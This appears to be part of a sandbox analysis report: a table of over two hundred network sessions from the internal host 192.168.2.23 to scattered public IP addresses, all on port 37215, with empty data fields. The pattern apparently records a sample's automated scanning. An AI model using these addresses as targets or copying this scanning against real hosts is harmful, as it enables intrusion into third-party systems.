                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12859192.168.2.2344654123.3.3.6037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12860192.168.2.233386241.51.5.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12861192.168.2.2357508197.214.194.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12862192.168.2.2342602162.128.25.22737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12863192.168.2.2340114145.244.74.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12864192.168.2.2344990220.100.248.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12865192.168.2.235932041.214.38.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12866192.168.2.235534241.222.57.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12867192.168.2.234986241.196.119.23437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12868192.168.2.235094241.88.54.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12869192.168.2.2357654197.244.74.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12870192.168.2.233424041.101.20.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12871192.168.2.233458241.210.105.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12872192.168.2.2342456157.89.55.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12873192.168.2.234828841.150.125.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12874192.168.2.2351616197.68.142.20137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12875192.168.2.2338264197.133.132.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12876192.168.2.2341442197.68.5.20837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12877192.168.2.233846241.160.71.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12878192.168.2.2358394157.91.171.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12879192.168.2.234269073.228.154.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12880192.168.2.2360408157.179.75.1037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12881192.168.2.2353584197.178.222.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12882192.168.2.235733241.228.52.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12883192.168.2.2350818155.220.129.13337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12884192.168.2.235320841.128.31.8537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12885192.168.2.2334086136.237.78.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12886192.168.2.236083418.6.12.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12887192.168.2.234042641.4.6.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12888192.168.2.2343176197.73.230.19737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12889192.168.2.2346568197.149.244.17737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12890192.168.2.2358948157.53.129.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12891192.168.2.235522641.94.189.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12892192.168.2.234031441.43.167.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12893192.168.2.234003441.73.226.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12894192.168.2.235291241.151.98.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12895192.168.2.2340956197.63.158.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12896192.168.2.2343184157.41.224.22837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12897192.168.2.2358522157.98.137.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12898192.168.2.2353436197.114.126.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12899192.168.2.235386241.27.166.8437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12900192.168.2.2339310197.16.66.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12901192.168.2.2339724197.238.99.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12902192.168.2.2332820157.185.168.7437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12903192.168.2.2335772197.36.159.16837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12904192.168.2.2344934157.138.194.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12905192.168.2.2355084197.132.214.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12906192.168.2.2334190157.180.154.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12907192.168.2.2337980197.164.243.19437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12908192.168.2.2337214197.39.196.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12909192.168.2.235271241.133.41.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12910192.168.2.235557041.160.99.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12911192.168.2.233675841.94.99.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12912192.168.2.2338420197.163.192.20137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12913192.168.2.2335122197.52.149.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12914192.168.2.234845041.163.216.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12915192.168.2.233281441.47.26.6537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12916192.168.2.2359062157.29.40.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12917192.168.2.2334330157.55.199.14737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12918192.168.2.2351734174.81.15.15437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12919192.168.2.2344754197.214.15.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12920192.168.2.2337470157.140.32.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12921192.168.2.2355452157.63.6.14037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12922192.168.2.233454441.233.234.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12923192.168.2.2344394197.146.112.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12924192.168.2.2337400197.141.178.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12925192.168.2.235861241.241.76.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12926192.168.2.2335580156.8.162.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12927192.168.2.2340588157.100.248.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12928192.168.2.2339348197.227.49.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12929192.168.2.2357272197.2.113.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12930192.168.2.2345080197.153.218.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12931192.168.2.2348632157.94.134.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12932192.168.2.235993619.12.241.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12933192.168.2.235875835.71.65.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12934192.168.2.235845241.171.233.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12935192.168.2.236078441.144.126.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12936192.168.2.2349990157.73.165.18137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12937192.168.2.2347010157.84.135.9537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12938192.168.2.2347092197.32.96.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12939192.168.2.235746241.230.125.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12940192.168.2.235596041.211.109.12637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12941192.168.2.235652871.44.130.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12942192.168.2.233731637.139.100.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12943192.168.2.2349042197.147.145.4537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12944192.168.2.2351090197.147.56.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12945192.168.2.2332806197.122.189.2537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12946192.168.2.234805080.76.123.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12947192.168.2.233631490.26.136.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12948192.168.2.2360976197.58.201.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12949192.168.2.235039841.115.243.4937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12950192.168.2.2343474172.133.170.8537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12951192.168.2.2337696197.12.11.10137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12952192.168.2.235029041.81.174.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12953192.168.2.2343218197.212.211.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12954192.168.2.2345614157.32.226.24937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12955192.168.2.233664441.140.58.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12956192.168.2.2354088157.157.204.8237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12957192.168.2.234252241.235.209.9237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12958192.168.2.2332802197.230.139.6537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12959192.168.2.234936041.213.8.19037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12960192.168.2.234050286.144.117.14337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12961192.168.2.2338204199.12.180.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12962192.168.2.2343134135.15.29.23037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12963192.168.2.2334170197.212.181.18937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12964192.168.2.233478641.221.68.18937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12965192.168.2.2334384197.2.71.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12966192.168.2.233866441.8.204.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12967192.168.2.2341194157.19.101.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12968192.168.2.2359216157.1.130.6537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12969192.168.2.2340398197.88.174.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12970192.168.2.2346752197.238.254.19737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12971192.168.2.2343402197.15.124.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12972192.168.2.2342444197.210.120.22037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12973192.168.2.234194241.82.120.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12974192.168.2.2359466205.45.63.8137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12975192.168.2.234572441.207.172.1637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12976192.168.2.235300241.194.226.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12977192.168.2.2358808197.220.188.18337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12978192.168.2.2348330181.119.218.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12979192.168.2.235694241.69.130.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12980192.168.2.235017641.149.47.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12981192.168.2.2341114157.155.178.14737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12982192.168.2.2348048108.8.2.12437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12983192.168.2.2347908197.234.193.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12984192.168.2.2359252197.119.8.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12985192.168.2.234768444.228.132.4437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12986192.168.2.2360146157.184.167.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12987192.168.2.2346504197.63.119.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12988192.168.2.2355986157.93.42.25037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12989192.168.2.2342786157.89.202.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12990192.168.2.235474841.164.82.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12991192.168.2.234537241.27.244.19737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12992192.168.2.2356232197.93.239.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12993192.168.2.234697441.80.140.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12994192.168.2.2356672157.242.76.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12995192.168.2.2344730116.58.177.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12996192.168.2.235850841.133.209.14537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12997192.168.2.2360640197.178.221.25237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12998192.168.2.2342576157.36.143.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          12999192.168.2.2340056197.68.79.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13000192.168.2.233284041.110.16.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13001192.168.2.2333790197.183.23.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13002192.168.2.234796041.80.37.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13003192.168.2.2355112197.19.13.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13004192.168.2.2345324157.70.26.1937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13005192.168.2.2354648157.147.17.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13006192.168.2.2342016157.250.238.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13007192.168.2.234691644.83.202.23137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13008192.168.2.2358994157.96.120.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13009192.168.2.2349686197.42.100.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13010192.168.2.235584279.88.29.9137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13011192.168.2.2355442197.142.238.2537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13012192.168.2.2345804197.181.155.6137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13013192.168.2.2338176197.248.14.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13014192.168.2.2351976197.134.181.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13015192.168.2.234105641.167.192.9037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13016192.168.2.233544241.165.62.1537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13017192.168.2.2351652197.225.147.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13018192.168.2.2344178157.239.161.19137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13019192.168.2.2360100118.150.173.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13020192.168.2.2335558197.132.202.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13021192.168.2.2335646157.55.67.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13022192.168.2.2343496197.132.163.13737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13023192.168.2.2344906157.113.169.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13024192.168.2.2352932157.13.201.9837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13025192.168.2.2357020129.25.140.20237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13026192.168.2.23399248.204.254.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13027192.168.2.2352948157.100.152.6837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13028192.168.2.235277041.171.204.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13029192.168.2.2346110183.184.190.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13030192.168.2.2341676157.244.149.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13031192.168.2.2346908157.60.226.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13032192.168.2.2343554124.43.221.3937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13033192.168.2.235088241.97.253.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13034192.168.2.2352752157.6.137.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13035192.168.2.2356836157.191.241.6337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13036192.168.2.2346070157.78.174.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13037192.168.2.235135041.161.193.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13038192.168.2.2358560197.112.100.18737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13039192.168.2.2339282179.84.65.20837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13040192.168.2.234039041.118.21.10637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13041192.168.2.2344752197.99.29.4937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13042192.168.2.2338970157.9.206.737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13043192.168.2.2353476197.38.239.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13044192.168.2.2353176197.98.205.13537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13045192.168.2.2335670197.4.102.10737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13046192.168.2.2360432157.176.155.4937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13047192.168.2.234170241.215.221.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13048192.168.2.2333782157.103.133.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13049192.168.2.2333070157.142.186.19737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13050192.168.2.234523641.91.20.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13051192.168.2.2351258157.210.99.21437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13052192.168.2.2340214157.249.168.4637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13053192.168.2.235628841.84.7.2937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13054192.168.2.2336308197.0.124.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13055192.168.2.2354906197.225.149.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13056192.168.2.2360342179.214.22.10237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13057192.168.2.234322841.211.75.237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13058192.168.2.2350348197.254.111.537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13059192.168.2.2334946157.52.215.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13060192.168.2.2357900157.98.76.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13061192.168.2.2350612107.89.200.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13062192.168.2.235925041.223.57.11137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13063192.168.2.2352980197.103.108.13537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13064192.168.2.2342034147.203.106.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13065192.168.2.2350048157.32.48.10537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13066192.168.2.2346732197.148.151.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13067192.168.2.2355452197.19.214.4037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13068192.168.2.2356338197.74.232.6437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13069192.168.2.235776441.88.168.21137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13070192.168.2.234540441.2.33.937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13071192.168.2.235465641.109.14.22737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13072192.168.2.2357526157.81.161.7537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13073192.168.2.234233069.206.35.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13074192.168.2.2335738197.250.110.19337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13075192.168.2.2358942157.79.31.18837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13076192.168.2.2360778197.205.42.8837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
